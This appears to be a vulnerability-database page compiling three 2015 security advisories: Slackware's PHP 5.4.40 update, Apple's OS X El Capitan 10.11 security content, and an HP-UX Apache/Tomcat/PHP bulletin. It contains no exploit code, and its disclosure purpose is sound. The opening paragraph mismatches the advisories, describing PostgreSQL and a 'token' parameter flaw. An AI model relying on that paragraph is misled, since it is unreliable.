An attacker can exploit this issue to crash the affected application, denying service to legitimate users. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. PostgreSQL (aka pgsql) is one of the object-relational database management system extensions. The vulnerability is caused by the program not correctly validating the 'token' parameter extraction of the form name.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.4.40-i486-1_slack14.1.txz: Upgraded.
Please note that this package build also moves the configuration files
from /etc/httpd to /etc, /etc/php.d, and /etc/php-fpm.d.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.40-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.40-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.40-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.40-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
2666059d6540b1b4385d25dfc5ebbe99 php-5.4.40-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
c146f500912ba9c7e5d652e5e3643c04 php-5.4.40-x86_64-1_slack14.0.txz
Slackware 14.1 package:
9efc8a96f9a3f3261e5f640292b1b781 php-5.4.40-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
2c95e077f314f1cfa3ee83b9aba90b91 php-5.4.40-x86_64-1_slack14.1.txz
Slackware -current package:
30d14f237c71fada0d594c2360a58016 n/php-5.6.8-i486-1.txz
Slackware x86_64 -current package:
1a0fcc590aa4dff5de5f08293936d0d9 n/php-5.6.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg php-5.4.40-i486-1_slack14.1.txz
Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to inject arbitrary code to
processes loading the Address Book framework
Description: An issue existed in Address Book framework's handling
of an environment variable. This issue was addressed through improved
environment variable handling.
CVE-ID
CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may be able
to extract payload from eSCL packets sent over a secure connection
Description: An issue existed in the processing of eSCL packets.
This issue was addressed through improved validation checks.
CVE-ID
CVE-2015-5853 : an anonymous researcher
apache_mod_php
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.27, including one which may have led to remote code execution.
This issue was addressed by updating PHP to version 5.5.27.
CVE-ID
CVE-2014-9425
CVE-2014-9427
CVE-2014-9652
CVE-2014-9705
CVE-2014-9709
CVE-2015-0231
CVE-2015-0232
CVE-2015-0235
CVE-2015-0273
CVE-2015-1351
CVE-2015-1352
CVE-2015-2301
CVE-2015-2305
CVE-2015-2331
CVE-2015-2348
CVE-2015-2783
CVE-2015-2787
CVE-2015-3329
CVE-2015-3330
Apple Online Store Kit
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may gain access to a user's keychain
items
Description: An issue existed in validation of access control lists
for iCloud keychain items. This issue was addressed through improved
access control list checks.
CVE-ID
CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of
Indiana University, Tongxin Li of Peking University, Tongxin Li of
Peking University, Xiaolong Bai of Tsinghua University
AppleEvents
Available for: Mac OS X v10.6.8 and later
Impact: A user connected through screen sharing can send Apple
Events to a local user's session
Description: An issue existed with Apple Event filtering that
allowed some users to send events to other users. This was addressed
by improved Apple Event handling.
CVE-ID
CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio
Available for: Mac OS X v10.6.8 and later
Impact: Playing a malicious audio file may lead to an unexpected
application termination
Description: A memory corruption issue existed in the handling of
audio files. This issue issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in bash
Description: Multiple vulnerabilities existed in bash versions prior
to 3.2 patch level 57. These issues were addressed by updating bash
version 3.2 to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Certificate Trust Policy
Available for: Mac OS X v10.6.8 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at https://support.apple.com/en-
us/HT202858.
CFNetwork Cookies
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A cross-domain cookie issue existed in the handling of
top level domains. The issue was address through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork FTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description: An issue existed in the handling of FTP packets when
using the PASV command. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A maliciously crafted URL may be able to bypass HSTS and
leak sensitive data
Description: A URL parsing vulnerability existed in HSTS handling.
This issue was addressed through improved URL parsing.
CVE-ID
CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A malicious website may be able to track users in Safari
private browsing mode
Description: An issue existed in the handling of HSTS state in
Safari private browsing mode. This issue was addressed through
improved state handling.
CVE-ID
CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies
Available for: Mac OS X v10.6.8 and later
Impact: Connecting to a malicious web proxy may set malicious
cookies for a website
Description: An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of RC4.
An attacker could force the use of RC4, even if the server preferred
better ciphers, by blocking TLS 1.0 and higher connections until
CFNetwork tried SSL 3.0, which only allows RC4. This issue was
addressed by removing the fallback to SSL 3.0.
CoreCrypto
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to determine a private key
Description: By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.
CoreText
Available for: Mac OS X v10.6.8 and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguTeam
Disk Images
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in DiskImages. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : TaiG Jailbreak Team
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application can prevent some systems from
booting
Description: An issue existed with the addresses covered by the
protected range register. This issue was fixed by changing the
protected range.
CVE-ID
CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Apple Ethernet Thunderbolt adapter may be able
to affect firmware flashing
Description: Apple Ethernet Thunderbolt adapters could modify the
host firmware if connected during an EFI update. This issue was
addressed by not loading option ROMs during updates.
CVE-ID
CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder
Available for: Mac OS X v10.6.8 and later
Impact: The "Secure Empty Trash" feature may not securely delete
files placed in the Trash
Description: An issue existed in guaranteeing secure deletion of
Trash files on some systems, such as those with flash storage. This
issue was addressed by removing the "Secure Empty Trash" option.
CVE-ID
CVE-2015-5901 : Apple
Game Center
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Game Center application may be able to access a
player's email address
Description: An issue existed in Game Center in the handling of a
player's email. This issue was addressed through improved access
restrictions.
CVE-ID
CVE-2015-5855 : Nasser Alnasser
Heimdal
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to replay Kerberos credentials to
the SMB server
Description: An authentication issue existed in Kerberos
credentials. This issue was addressed through additional validation
of credentials using a list of recently seen credentials.
CVE-ID
CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu
Fan of Microsoft Corporation, China
ICU
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in ICU
Description: Multiple vulnerabilities existed in ICU versions prior
to 53.1.0. These issues were addressed by updating ICU to version
55.1.
CVE-ID
CVE-2014-8146
CVE-2014-8147
CVE-2015-5922
Install Framework Legacy
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to gain root privileges
Description: A restriction issue existed in the Install private
framework containing a privileged executable. This issue was
addressed by removing the executable.
CVE-ID
CVE-2015-5888 : Apple
Intel Graphics Driver
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Multiple memory corruption issues existed in the Intel
Graphics Driver. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5830 : Yuki MIZUNO (@mzyy94)
CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in IOAudioFamily that led to the
disclosure of kernel memory content. This issue was addressed by
permuting kernel pointers.
CVE-ID
CVE-2015-5864 : Luca Todesco
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5871 : Ilja van Sprundel of IOActive
CVE-2015-5872 : Ilja van Sprundel of IOActive
CVE-2015-5873 : Ilja van Sprundel of IOActive
CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in IOGraphics which could have led to
the disclosure of kernel memory layout. This issue was addressed
through improved memory management.
CVE-ID
CVE-2015-5865 : Luca Todesco
IOHIDFamily
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5866 : Apple
CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to read kernel memory
Description: A memory initialization issue existed in the kernel.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
Kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team
CVE-2015-5896 : Maxime Villard of m00nbsd
CVE-2015-5903 : CESG
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local process can modify other processes without
entitlement checks
Description: An issue existed where root processes using the
processor_set_tasks API were allowed to retrieve the task ports of
other processes. This issue was addressed through additional
entitlement checks.
CVE-ID
CVE-2015-5882 : Pedro Vilaca, working from original research by
Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may control the value of stack cookies
Description: Multiple weaknesses existed in the generation of user
space stack cookies. These issues were addressed through improved
generation of stack cookies.
CVE-ID
CVE-2013-3951 : Stefan Esser
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to launch denial of service attacks
on targeted TCP connections without knowing the correct sequence
number
Description: An issue existed in xnu's validation of TCP packet
headers. This issue was addressed through improved TCP packet header
validation.
CVE-ID
CVE-2015-5879 : Jonathan Looney
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a local LAN segment may disable IPv6 routing
Description: An insufficient validation issue existed in the
handling of IPv6 router advertisements that allowed an attacker to
set the hop limit to an arbitrary value. This issue was addressed by
enforcing a minimum hop limit.
CVE-ID
CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed that led to the disclosure of kernel
memory layout. This was addressed through improved initialization of
kernel memory structures.
CVE-ID
CVE-2015-5842 : beist of grayhash
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in debugging interfaces that led to
the disclosure of memory content. This issue was addressed by
sanitizing output from debugging interfaces.
CVE-ID
CVE-2015-5870 : Apple
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to cause a system denial of service
Description: A state management issue existed in debugging
functionality. This issue was addressed through improved validation.
CVE-ID
CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse
Corporation
libpthread
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc
Available for: Mac OS X v10.6.8 and later
Impact: Many SSH connections could cause a denial of service
Description: launchd had no limit on the number of processes that
could be started by a network connection. This issue was addressed by
limiting the number of SSH processes to 40.
CVE-ID
CVE-2015-5881 : Apple
Login Window
Available for: Mac OS X v10.6.8 and later
Impact: The screen lock may not engage after the specified time
period
Description: An issue existed with captured display locking. The
issue was addressed through improved lock handling.
CVE-ID
CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau
informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni
Vaahtera, and an anonymous researcher
lukemftpd
Available for: Mac OS X v10.6.8 and later
Impact: A remote attacker may be able to deny service to the FTP
server
Description: A glob-processing issue existed in tnftpd. This issue
was addressed through improved glob validation.
CVE-ID
CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail
Available for: Mac OS X v10.6.8 and later
Impact: Printing an email may leak sensitive user information
Description: An issue existed in Mail which bypassed user
preferences when printing an email. This issue was addressed through
improved user preference enforcement.
CVE-ID
CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,
Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim
Technology Partners
Mail
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position may be able to
intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop
Description: An issue existed in handling encryption parameters for
large email attachments sent via Mail Drop. The issue is addressed by
no longer offering Mail Drop when sending an encrypted e-mail.
CVE-ID
CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to observe unprotected
multipeer data
Description: An issue existed in convenience initializer handling in
which encryption could be actively downgraded to a non-encrypted
session. This issue was addressed by changing the convenience
initializer to require encryption.
CVE-ID
CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An uninitialized memory issue in the kernel led to the
disclosure of kernel memory content. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2015-5831 : Maxime Villard of m00nbsd
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: An issue existed in parsing links in the Notes
application. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: A cross-site scripting issue existed in parsing text by
the Notes application. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSH
Description: Multiple vulnerabilities existed in OpenSSH versions
prior to 6.9. These issues were addressed by updating OpenSSH to
version 6.9.
CVE-ID
CVE-2014-2532
OpenSSL
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-0286
CVE-2015-0287
procmail
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in procmail
Description: Multiple vulnerabilities existed in procmail versions
prior to 3.22. These issues were addressed by removing procmail.
CVE-ID
CVE-2014-3618
remote_cmds
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with root
privileges
Description: An issue existed in the usage of environment variables
by the rsh binary. This issue was addressed by dropping setuid
privileges from the rsh binary.
CVE-ID
CVE-2015-5889 : Philip Pettersson
removefile
Available for: Mac OS X v10.6.8 and later
Impact: Processing malicious data may lead to unexpected application
termination
Description: An overflow fault existed in the checkint division
routines. This issue was addressed with improved division routines.
CVE-ID
CVE-2015-5840 : an anonymous researcher
Ruby
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in Ruby
Description: Multiple vulnerabilities existed in Ruby versions prior
to 2.0.0p645. These were addressed by updating Ruby to version
2.0.0p645.
CVE-ID
CVE-2014-8080
CVE-2014-8090
CVE-2015-1855
Security
Available for: Mac OS X v10.6.8 and later
Impact: The lock state of the keychain may be incorrectly displayed
to the user
Description: A state management issue existed in the way keychain
lock status was tracked. This issue was addressed through improved
state management.
CVE-ID
CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,
Eric E. Lawrence, Apple
Security
Available for: Mac OS X v10.6.8 and later
Impact: A trust evaluation configured to require revocation checking
may succeed even if revocation checking fails
Description: The kSecRevocationRequirePositiveResponse flag was
specified but not implemented. This issue was addressed by
implementing the flag.
CVE-ID
CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security
Available for: Mac OS X v10.6.8 and later
Impact: A remote server may prompt for a certificate before
identifying itself
Description: Secure Transport accepted the CertificateRequest
message before the ServerKeyExchange message. This issue was
addressed by requiring the ServerKeyExchange first.
CVE-ID
CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of
Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in SMBClient that led to the
disclosure of kernel memory content. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in SQLite v3.8.5
Description: Multiple vulnerabilities existed in SQLite v3.8.5.
These issues were addressed by updating SQLite to version 3.8.10.2.
CVE-ID
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
Telephony
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker can place phone calls without the user's
knowledge when using Continuity
Description: An issue existed in the authorization checks for
placing phone calls. This issue was addressed through improved
authorization checks.
CVE-ID
CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal
Available for: Mac OS X v10.6.8 and later
Impact: Maliciously crafted text could mislead the user in Terminal
Description: Terminal did not handle bidirectional override
characters in the same way when displaying text and when selecting
text. This issue was addressed by suppressing bidirectional override
characters in Terminal.
CVE-ID
CVE-2015-5883 : an anonymous researcher
tidy
Available for: Mac OS X v10.6.8 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues existed in tidy.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5522 : Fernando Munoz of NULLGroup.com
CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may gain access to keychain items
Description: An issue existed in backups by the Time Machine
framework. This issue was addressed through improved coverage of Time
Machine backups.
CVE-ID
CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of
Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw
S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO
/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6
QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54
YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop
hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O
c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR
8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r
N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT
fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1
nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e
g6jld/w5tPuCFhGucE7Z
=XciV
-----END PGP SIGNATURE-----
.
Release Date: 2015-06-10
Last Updated: 2015-06-10
Potential Security Impact: Remote denial of service (DoS), man-in-the-middle
(MitM) attack, modification of data, local modification of data
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with the HP-UX Apache
Web Server Suite, Tomcat Servlet Engine, and PHP. These could be exploited
remotely to create a Denial of Service (DoS) and other vulnerabilities.
HP-UX B.11.31 running HP-UX Apache Web Server Suite v4.04 or earlier
HP-UX B.11.31 running HP-UX Apache Web Server v2.2.15.22 or earlier
HP-UX B.11.31 running Tomcat Servlet Engine v6.0.39.03 or earlier
HP-UX B.11.31 running PHP v5.4.11.04 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-5704 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0227 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9709 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-1352 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2305 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2783 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve the
vulnerabilities.
The updates are available for download from http://software.hp.com
NOTE: HP-UX Web Server Suite v4.05 HPUXWSATW405 contains Apache v2.2.29.01,
Tomcat Servlet Engine 6.0.43.01, PHP 5.4.40.01, and Webmin v1.070.13
HP-UX 11i Release
Apache Depot name
B.11.31 (11i v3 32-bit)
HP_UX_11.31_HPUXWS22ATW-B405-11-31-64.depot
B.11.31 (11i v3 64-bit)
HP_UX_11.31_HPUXWS22ATW-B405-11-31-64.depot
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v4.05 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.29.01 or subsequent
hpuxws22TOMCAT.TOMCAT
action: install revision C.6.0.43.01 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 10 June 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
